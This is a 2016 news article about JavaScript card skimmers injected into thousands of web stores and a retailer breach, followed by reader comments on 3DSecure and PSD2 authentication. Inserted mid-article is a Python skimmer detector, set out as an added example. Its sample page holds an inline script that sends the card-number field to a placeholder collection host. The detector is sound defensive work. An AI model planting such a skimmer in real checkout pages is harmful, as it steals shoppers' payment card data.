Hackers hit 6000 web stores to steal card data

Crooks have injected malicious code into 5925 online stores, enabling them to steal payment card details, according to a Dutch developer.

Willem De Groot says that hackers have been gaining access to the stores' source code using unpatched software flaws, and installing JavaScript wiretaps to steal card data. The information makes its way to an off-shore collection server - usually in Russia, says De Groot - before being put up for sale on the dark web for around $30 a card.
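A defender-side check for the kind of injected JavaScript wiretap described above, added here as an example and not code from the article or from De Groot's scanner: it parses a checkout page, flags script tags loaded from hosts outside an allowlist, and flags inline scripts that both read card fields and name an off-site host. The field names, the allowlist and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a skimmer must read to capture card data (constructed list).
PAYMENT_FIELDS = ("card_number", "cc_number", "cvv", "cc_cid", "expiry")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

class _ScriptCollector(HTMLParser):
    # Collects <script src> URLs and the bodies of inline <script> blocks.
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script" and dict(attrs).get("src"):
            self.srcs.append(dict(attrs)["src"])
        elif tag == "script":
            self._buf = []  # start capturing an inline body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def find_skimmers(html, allowed_hosts):
    """Return (kind, host) findings: script tags loaded from off-site hosts,
    and inline scripts that read payment fields AND name an off-site host."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.srcs:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external_script", host))
    for body in p.inline:
        foreign = sorted(set(HOST_RE.findall(body)) - set(allowed_hosts))
        if foreign and any(f in body for f in PAYMENT_FIELDS):
            findings.append(("inline_exfil", foreign[0]))
    return findings

# Constructed sample page (placeholder hosts, not real sites): one first-party
# script, one off-site script tag and one inline wiretap on the card field.
SAMPLE_HTML = """<script src="https://shop.example/js/checkout.js"></script>
<script src="https://cdn.placeholder-bad.example/x.js"></script>
<script>document.forms[0].onsubmit = function () { new Image().src =
  'https://collect.placeholder-bad.example/?q=' + document.getElementById('cc_number').value; };</script>"""
ALLOWED = {"shop.example"}
```

An obfuscated skimmer will not match a plain-text host pattern, so a check like this belongs alongside a Content-Security-Policy that restricts script-src, connect-src and img-src, not in place of it.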

De Groot scanned a batch of 255,000 online stores last November, when he first heard about the scam. At the time he found 3501 compromised sites but by this September the number of victims had risen to 5925 and included Audi, pop star Bjork and Washington Cathedral.

Separately, fashion retailer Vera Bradley says that it has been told by law enforcement about a data breach that puts customer card details at risk. Cards used at the firm's shops between the end of July and end of September may have been affected.

Crooks appear to have accessed Vera Bradley's payment processing system and installed a program designed to find card numbers, cardholder names, expiration dates, and internal verification codes via mag stripes.

Comments: (10)

A Finextra member, 14 October, 2016, 14:08

Merchants protected by 3DSecure or its big data successors will not be too worried; merchants who are not embracing 3DS should be concerned.

Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune, 14 October, 2016, 16:35

Merchants protected by 3DS will have bigger worries - like how to pay their bills.

Mitigating Fraud Does Not Pay The Bills

A Finextra member, 16 October, 2016, 08:17

Oddly, all the merchants in the U.K. that use 3DS pay their bills. UK consumers still buy online with confidence. The UK is one of the world's most advanced ecommerce markets. It has very low fraud rates and low interchange too. By using 3DS and AVS they also stop fraudsters from paying their bills or subsidising other illegal activity. You seem to have a major downer on any effective counter-fraud solution, POS or ecommerce. Why is that?

Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune, 16 October, 2016, 11:00

Come out of anonymity if you expect me to answer personal questions.

Jan-Olof Brunila - Swedbank - Stockholm, 17 October, 2016, 09:58

E-comm crooks now need to make their last push in the EU, and anybody active in ecommerce needs to prepare for the new rules. In 2018 the updated payment services directive including the strong customer authentication mandate (PSD2 + SCA) will demand a super-3DS with strong two-factor authentication of both the payer consent + the amount. If not in place, payer account service providers (card issuers and others) must decline transaction attempts, also from e-comm merchants outside the EU if the payer has an EU area payment account... Furthermore there will be penalties for any business that is negligent with personal data security - and a card number is personal data. E-commerce is becoming mainstream.

A Finextra member, 17 October, 2016, 10:17

Hi Jan-Olof, it's interesting that in the UK (and possibly elsewhere) CA/Arcot's issuer-side 3DSecure solution is using 'big data' to completely waive the 3DS password challenge and reply process...

The decisioning (Authorise - Challenge - Decline) is based on historic consumer behaviour and the intelligent assessment of threat. I am not here to sell CA services, but as a consumer of them, via my bank (First Direct/HSBC), I am a huge fan; these transactions are frictionless but authenticated to a very high level of confidence for myself and the merchant.

Jan-Olof Brunila - Swedbank - Stockholm, 17 October, 2016, 10:37

Dear David, the EBA circulated a regulatory tech standards doc for strong customer authentication that specifically comments that risk-based authentication is not allowed when the SCA-RTS go live in 2018. So from the go-live date there is legislation that backs up the demand for strong two-factor or biometric authentication (with a free zone for less than 10 Euro e-comm payments)! If we believe that the EU authorities are going to realise this legislation according to plan, we now need to start figuring out how we implement it in a user-friendly way.

Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune, 17 October, 2016, 18:32

Would be interesting to see the impact of SCA-RTS on recurring payments. The Indian banking regulator mandated "explicit 2FA" via 3DS for all online card payments a few years ago. Apart from increasing friction and reducing conversion for one-off online card payments, the mandate virtually killed companies whose business model relies on monthly subscriptions (e.g. SaaS, media) - you can imagine the friction involved in individually having to two-factor authenticate 12 payments a year for each subscription service a customer has signed up for. Many subscription-based companies shifted their domicile overseas so that they could use ePGs that don't insist on 2FA; many customers - like me - opted for overseas service providers just to escape the onerous 2FA payments every month. A month ago, the regulator announced an exemption from 2FA: now only the first of the 12 months' payments is subject to 2FA. The remaining 11 monthly payments can happen without 2FA. The subscription industry has heaved a sigh of relief. I wonder how the EU subscription industry will react to SCA-RTS.

Hitesh Thakkar - SME - Fintech startups (APAC and Africa) - India, 17 October, 2016, 18:42

Fraud prevention and risk management have become really costly and a matter of business case to monetise. Refer to the recent PCI DSS compliance impact in the UK.

A Finextra member, 18 October, 2016, 09:09

It is true; the EBA are discussing the future of risk-based authentication "as we know it". That, however, does not mean the end for risk-based authentication. The technology we refer to as risk-based authentication is a sophisticated approach to trusted devices and shopping behaviour, which will be needed more than ever in the constant battle to secure payments. Already fraudsters are harvesting victims' fingerprints and finding inventive ways to hack selfie technology. The EBA's guidelines are pretty simple; they require a two-factor approach to authenticating online transactions, something:

1. You have
2. You are
3. You know

The device is something you have; risk-based can intelligently confirm the device is trusted and behaving in a way that is indicative of a consumer's normal behaviour, and more importantly spot fraudulent patterns and anomalies. Recently a fraud attempt was made on my credit card; the bank was able to detect the transactions as fraudulent, even though the amounts were below £10, by seeing an untrusted device in a strange location. I don't use the card very often, so two transactions in quick succession set off an alert. Risk-based authentication takes care of the first factor, verifying the cardholder is in possession of the device.

Let's look at the second factor:  

Fingerprint - something you are 

Dynamic knowledge questions - something you know 

Selfies - something you are 

One-time pin - something you know 

Dynamic CVV - something you know 

App based push notification - something you know  

The truth is risk-based will just change its purpose; today it has been implemented to reduce inconvenience to cardholders, reducing the frequency with which they have to enter their password, and let's be honest, passwords have been a real pain, causing unacceptable levels of abandonment through forgotten credentials. 100% challenge, however, if the challenge is a fingerprint or something else that is easy, is not such a big deal, nor is asking someone to click yes or no to "are you in Starbucks?" We can all agree it is much less painful than a blocked card and a call to the fraud department to unblock it. But to avoid serious authentication overkill, risk-based allows one of the two factors to be invisible.

All that said, the EBA guidelines are not final. Many banks are lobbying against the idea of 100% challenge. Either way, an intelligent machine learning approach to anomaly detection and device trust will not be going away.